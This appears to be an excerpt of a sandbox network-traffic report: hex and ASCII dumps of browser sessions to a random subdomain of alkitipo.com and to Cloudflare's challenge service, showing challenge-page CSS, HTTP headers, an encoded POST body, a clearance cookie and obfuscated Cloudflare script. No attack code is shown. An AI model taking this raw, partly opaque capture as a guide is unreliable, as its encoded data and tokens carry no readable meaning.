                                                                      2025-03-19 10:29:54 UTC1030INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 65 26 23 78 32 37 3b 3b 20 73 63 72 69 70 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 63 65 2d 4b 30 6a 71 6b 64 62 43 64 38 55 34 58 56 64 47 26 23 78 32 37 3b 20 26 23 78 32 37 3b 75 6e 73 61 66 65 2d
                                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="x-ua-compatible" content="IE=Edge,chrome=1"> <meta http-equiv="content-security-policy" content="default-src &#x27;none&#x27;; script-src &#x27;nonce-K0jqkdbCd8U4XVdG&#x27; &#x27;unsafe-
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 33 30 70 78 20 30 20 30 20 23 64 65 31 33 30 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 32 33 32 33 32 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 66 66 66 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 30 31 29 7d 74 6f 7b 74 72 61 6e 73 66 6f
                                                                      Data Ascii: ames fillfail{to{box-shadow:inset 0 30px 0 0 #de1303}}@keyframes fillfail-offlabel{to{box-shadow:inset 0 0 0 30px #232323}}@keyframes fillfail-offlabel-dark{to{box-shadow:inset 0 0 0 30px #fff}}@keyframes scale-up-center{0%{transform:scale(.01)}to{transfo
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 6f 76 65 72 72 75 6e 2d 69 2c 23 73 70 69 6e 6e 65 72 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 66 61 69 6c 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 38 35 2c 2e 36 38 2c 2e 35 33 29 20 62 6f 74 68 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 64 65 31 33 30 33 7d 23 66 61 69 6c 2d 69 2c 23 73 75 63 63 65 73 73 2d 69 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a
                                                                      Data Ascii: -align:right}#overrun-i,#spinner-i{animation:spin 5s linear infinite;display:flex;height:30px;width:30px}#fail-i{animation:scale-up-center .6s cubic-bezier(.55,.085,.68,.53) both;box-shadow:inset 0 0 0 #de1303}#fail-i,#success-i{border-radius:50%;display:
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 3a 23 30 61 61 39 33 37 3b 66 69 6c 6c 3a 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 78 70 69 72 65 64 2d 63 69 72 63 6c 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 74 69 6d 65 6f 75 74 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 39 39 39 3b 66 69 6c 6c 3a 23 39 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78
                                                                      Data Ascii: shadow:inset 0 0 0 #0aa937}.theme-dark .success-circle{stroke:#0aa937;fill:#0aa937}.theme-dark .expired-circle,.theme-dark .timeout-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#999;fill:#999}.theme-dark #ex
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 31 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65
                                                                      Data Ascii: 1}.theme-dark h1{color:#fff}.theme-dark #challenge-error-title{color:#ffa299}.theme-dark #challenge-error-title a,.theme-dark #challenge-error-title a:link,.theme-dark #challenge-error-title a:visited{color:#bbb}.theme-dark #challenge-error-title a:active
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 72 65 73 68 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 76 65 72 6c 61 79 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 3b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e
                                                                      Data Ascii: resh-link:active,.theme-dark #timeout-refresh-link:focus,.theme-dark #timeout-refresh-link:hover{color:#949494}.theme-dark .overlay{border-color:#ffa299;color:#ffa299}.theme-dark .error-message,.theme-dark .error-message a,.theme-dark .error-message a:lin
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 7d 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 34 70 78 20 34 70 78 20 30 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 6c 65 66 74 3a 35 70 78 3b 74 6f 70 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 77 69
                                                                      Data Ascii: t:checked~.cb-i{background-color:#fff;border-radius:5px;opacity:1;transform:rotate(0deg) scale(1)}.cb-lb input:checked~.cb-i:after{border:solid #c44d0e;border-radius:0;border-width:0 4px 4px 0;height:12px;left:5px;top:0;transform:rotate(45deg) scale(1);wi
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 7b 6d 61 72 67 69 6e 3a
                                                                      Data Ascii: content:center space-evenly;visibility:visible}.size-compact #expired-text,.size-compact #overrun-text,.size-compact #timeout-text{display:block}.size-compact #expired-refresh-link,.size-compact #timeout-refresh-link,.size-compact .error-message a{margin:
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 7d 23 74 65 72 6d 73 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 70 78 7d 23 74 65 72 6d 73 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 20 2e 32 72 65 6d 7d 23 74 65 72 6d 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 23 74 65 72 6d 73 20 61 2c 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 2c 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 7b 63
                                                                      Data Ascii: r{margin-left:0;margin-right:16px}#terms{color:#232323;display:inline-flex;font-size:8px;font-style:normal;justify-content:flex-end;line-height:10px}#terms .link-spacer{margin:0 .2rem}#terms a{display:inline-block}#terms a,#terms a:link,#terms a:visited{c


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.649714104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC754OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21 HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 16629
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Content-Type: text/plain;charset=UTF-8
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Origin: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC16384OUTData Raw: 36 67 33 45 43 7a 4c 5a 43 35 33 43 75 48 70 4c 58 4c 34 4f 30 45 7a 51 4f 2b 49 4f 55 59 55 47 47 7a 5a 4c 6e 4a 4f 6d 37 51 66 37 65 33 4f 52 6d 44 24 70 37 35 4c 31 4f 75 58 33 61 68 67 67 4f 2b 73 47 4f 6a 4f 47 51 47 33 4c 4f 32 47 4c 77 70 6f 45 73 35 67 79 4e 74 45 6d 37 6c 67 49 2b 4d 31 34 48 61 63 45 77 6c 43 50 49 53 4c 4d 4a 6d 73 55 4f 43 33 33 6b 55 52 7a 79 68 4f 41 61 68 65 57 79 4f 57 45 48 52 4f 7a 50 33 4f 55 45 7a 7a 45 6c 75 45 55 4f 4c 37 4f 30 35 46 4f 4c 53 79 4f 56 38 5a 2b 61 67 44 4c 2b 73 68 33 4f 7a 38 79 4f 7a 70 24 30 4f 24 7a 4f 4c 79 32 65 72 33 74 31 49 51 7a 61 7a 4c 57 77 49 67 4a 43 6c 4b 64 57 6d 4f 59 45 7a 55 2d 69 67 4f 5a 46 67 37 48 65 6d 42 32 61 4f 24 64 57 73 6c 59 2b 45 4f 72 73 59 65 55 33 53 43 64 73 35 4b
                                                                      Data Ascii: 6g3ECzLZC53CuHpLXL4O0EzQO+IOUYUGGzZLnJOm7Qf7e3ORmD$p75L1OuX3ahggO+sGOjOGQG3LO2GLwpoEs5gyNtEm7lgI+M14HacEwlCPISLMJmsUOC33kURzyhOAaheWyOWEHROzP3OUEzzEluEUOL7O05FOLSyOV8Z+agDL+sh3Oz8yOzp$0O$zOLy2er3t1IQzazLWwIgJClKdWmOYEzU-igOZFg7HemB2aO$dWslY+EOrsYeU3SCds5K
                                                                      2025-03-19 10:29:54 UTC245OUTData Raw: 2d 50 61 47 30 33 43 31 6f 68 4a 65 74 6e 72 4f 72 4f 47 52 61 50 44 38 72 61 68 49 4b 4f 72 4f 61 67 4f 36 4c 4f 74 70 4f 7a 69 4c 33 4f 61 67 43 76 4c 33 4f 4f 37 2b 4f 45 2d 72 6b 6b 4f 74 75 49 6c 33 42 4f 4e 65 5a 4f 56 63 4f 6c 52 7a 70 41 5a 6d 70 42 4d 6d 61 24 51 47 45 53 4f 64 39 72 38 57 70 6a 6c 74 72 65 4f 36 44 56 77 48 64 4f 32 7a 36 36 7a 53 75 37 36 6b 39 48 55 51 73 41 78 50 73 33 43 5a 4f 75 37 48 6e 5a 70 42 41 59 52 67 53 76 6e 36 51 6d 69 4f 4f 4f 75 49 24 47 7a 48 36 45 48 64 4f 38 59 4a 61 41 62 42 61 47 41 45 7a 2d 65 32 59 74 68 52 61 65 49 59 24 5a 45 47 4c 51 59 4f 5a 46 74 6f 6b 59 32 5a 73 4f 4c 48 59 6b 5a 50 64 65 6e 59 63 39 66 59 44 32 59 75 37 6d 6b 50 61 38 70 74 58 59 4f 4f 4f 64 59 4f 4f
                                                                      Data Ascii: -PaG03C1ohJetnrOrOGRaPD8rahIKOrOagO6LOtpOziL3OagCvL3OO7+OE-rkkOtuIl3BONeZOVcOlRzpAZmpBMma$QGESOd9r8WpjltreO6DVwHdO2z66zSu76k9HUQsAxPs3CZOu7HnZpBAYRgSvn6QmiOOOuI$GzH6EHdO8YJaAbBaGAEz-e2YthRaeIY$ZEGLQYOZFtokY2ZsOLHYkZPdenYc9fYD2Yu7mkPa8ptXYOOOdYOO
                                                                      2025-03-19 10:29:54 UTC1311INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=alkitipo.com; HttpOnly; Secure; SameSite=None
                                                                      Set-Cookie: cf_clearance=qNs1iY1VvRH90Ldoq1yEk.IxYRRXaV.XjHDpBJskUl4-1742380194-1.2.1.1-6JCfidD2ac1ldlMQ_J35HHpOaB1R2Qfd77afpZZaY6L38WJnRgGF3HbJn2.e_YfjrnLq4AbcuviEtgLFLi6GxCSB8fAreovMFHBRH6Kx8RGKvrKCYyQfc8HfmhPxpGL2V7RM3EsgKJOLmnmy1Isw5_Vffq.FczWDL_75R6f2X0vx5NM4V4Bns8PxfX1tyunl3.moUgvDLgJ5359Rrbq327WTEaCVdGApZaHTZmOf2cDxSH5swKuN_8jCjL4biGArDXjPSayB0.RkwzX9HXl6OgpoNmb9_5CaiJINx7tyLyG9UPpR0yTi7d3NcTC9QiBUu0H7HmviVAp6BwdbyYbgI1CAcAcGxz7hqx4aE5i64jA; Path=/; Expires=Thu, 19-Mar-26 10:29:54 GMT; Domain=alkitipo.com; HttpOnly; Secure; SameSite=None; Partitioned
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=saaxyAXWUXDFrCi%2Fv8TJP9J5Tbf1czX8eaN%2BbXCmIu%2F5vA5Ft%2B%2B8a6YhIkQ9mv5AVIc2pEGuHUKlU58VRD0JJoNy0W%2BVmA4DZ39RnZP1PySfTOmd81QTGsi3Q9ovsu8QGi6b6oB%2BzF%2BLWW6E5cwEZub34qT6NRVCDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9a5efddc8e-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:54 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 37 36 26 6d 69 6e 5f 72 74 74 3d 35 36 38 26 72 74 74 5f 76 61 72 3d 32 33 30 26 73 65 6e 74 3d 39 26 72 65 63 76 3d 32 30 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 35 31 26 72 65 63 76 5f 62 79 74 65 73 3d 31 38 30 32 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 34 35 33 39 31 38 34 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 32 64 66 38 61 66 30 65 63 33 37 38 30 34 38 26 74 73 3d 33 37 26 78 3d 30 22 0d 0a 0d 0a
                                                                      Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=576&min_rtt=568&rtt_var=230&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2851&recv_bytes=18021&delivery_rate=4539184&cwnd=250&unsent_bytes=0&cid=62df8af0ec378048&ts=37&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.649715104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC772OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=922c4a999a2565e0&lang=auto HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC331INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                      Content-Length: 119398
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9c08f3383b-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:55 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 6e 69 45 44 61 35 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f
                                                                      Data Ascii: window._cf_chl_opt.niEDa5={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23bro
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74
                                                                      Data Ascii: %20parent%20page.","turnstile_verifying":"Verifying...","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","t
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 61 75 78 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 67 75 69 64 65 6c 69 6e 65 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 65 4d 2c 65 4e 2c 65 4f 2c 65 56 2c 66 31 2c 66 34 2c 66 36 2c 66 37 2c 66 38 2c 66 6b 2c 66 77 2c 66 43 2c 66 44 2c 66 45 2c 66 4f 2c
                                                                      Data Ascii: here%20for%20more%20information%3C%2Fa%3E"},"polyfills":{"feedback_report_aux_subtitle":false,"feedback_report_output_subtitle":false,"feedback_report_guideline":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eV,f1,f4,f6,f7,f8,fk,fw,fC,fD,fE,fO,
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 65 59 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 65 59 2c 30 29 2c 65 4d 5b 67 4a 28 39 39 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 68 2c 64 2c 65 2c 66 2c 67 29 7b 68 68 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 68 28 34 32 30 29 5d 3d 68 68 28 31 33 37 32 29 2c 64 5b 68 68 28 31 36 30 37 29 5d 3d 68 68 28 39 39 36 29 2c 64 5b 68 68 28 31 30 32 33 29 5d 3d 68 68 28 35 31 39 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 68 68 28 34 34 39 29 5d 5b 68 68 28 31 33 39 30 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 68 68 28 31 32 32 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 69 2c 68 2c 69 2c 6b 29 7b 28 68 69 3d 68 68 2c 68 3d 7b 7d 2c 68 5b 68 69 28 37 36 32 29 5d 3d 65 5b 68 69
                                                                      Data Ascii: function(){setTimeout(eY,0)}):setTimeout(eY,0),eM[gJ(991)]=function(hh,d,e,f,g){hh=gJ,d={},d[hh(420)]=hh(1372),d[hh(1607)]=hh(996),d[hh(1023)]=hh(519),e=d,f=1,g=1e3*eM[hh(449)][hh(1390)](2<<f,32),eM[hh(1226)](function(hi,h,i,k){(hi=hh,h={},h[hi(762)]=e[hi
